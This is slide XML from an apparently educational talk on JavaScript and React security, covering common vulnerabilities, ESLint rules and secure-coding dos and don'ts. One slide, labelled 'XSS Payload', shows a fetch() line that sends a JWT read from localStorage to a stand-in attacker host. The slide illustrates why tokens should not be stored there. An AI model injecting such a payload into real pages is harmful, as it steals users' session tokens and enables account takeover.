      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4919552"/>
            <a:ext cx="10972800" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'http://attacker.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>logger?token</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r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>localStorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getItem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jwtToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4550220"/>
            <a:ext cx="1697901" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>XSS Payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5366180"/>
            <a:ext cx="10972800" cy="925759"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>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Solution:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Store JWTs in the cookies if you are using them for sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not store sensitive information in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>localStorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sessionStorage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237402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Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Don’ts:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Do not use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>dangerouslySetInnerHTML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Do not use untrusted input in creating URI attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Do not create components dynamically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Do not save sensitive data in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>localStorage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Dos:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Do perform JavaScript encoding of the state when using SSR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Do use authenticated POST requests with fetch()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Do use type checking in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>PropTypes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> in React </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://reactjs.org/docs/typechecking-with-proptypes.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Do use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ESLint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ESLint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>-plugin-React </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/yannickcr/eslint-plugin-react/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="852008471"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6400548" y="2165589"/>
          <a:ext cx="5468364" cy="1785904"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5468364">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1583231158"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="974628">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>"react/no-danger"</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"error"</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i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>"react/no-danger-with-children"</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"error"</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i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>"react/void-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>dom</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>-elements-no-children"</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“warn"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>"react/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>jsx</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>-no-duplicate-props"</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"warn"</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i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>"react/forbid-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>dom</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>-props"</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"error"</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"forbid"</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i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>href</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>"</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r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>formaction</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>]</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>}]</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="79024" marR="79024" marT="39512" marB="39512" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                    <a:solidFill>
                      <a:schemeClr val="bg2">
                        <a:lumMod val="95000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2002312474"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400548" y="1778034"/>
            <a:ext cx="3185487" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>ESLint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-plugin-React Config</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25248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Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="4136571"/>
            <a:ext cx="10058400" cy="2111830"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ksenia Peguero</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ksenia@synopsys.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Twitter: @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>KseniaDmitrieva</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.synopsys.com/software</a:t>
            </a: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2515" y="2670950"/>
            <a:ext cx="1814482" cy="3805370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3587919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447798" y="2633664"/>
            <a:ext cx="8551333" cy="2124604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:norm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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>State of JavaScript today</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common JavaScript vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>React vulnerabilities and security-related quirks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100666" y="2163499"/>
            <a:ext cx="10210799" cy="27302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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>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412998" y="2818671"/>
            <a:ext cx="7586133" cy="1419887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript makes me want to flip the table and say “screw all this”, but I can never be sure what “this” refers to.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37051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Client-Side JavaScript Field Today</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3"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4277" y="1815868"/>
            <a:ext cx="6106377" cy="3334215"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4540579" y="5436854"/>
            <a:ext cx="4490075" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>https://twitter.com/rbates/status/250620243309907969</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80134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8566" y="2638349"/>
            <a:ext cx="7089362" cy="1581955"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4875837" y="4043921"/>
            <a:ext cx="3345766" cy="496493"/>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4"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9057250" y="4461343"/>
            <a:ext cx="2029684" cy="273816"/>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accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
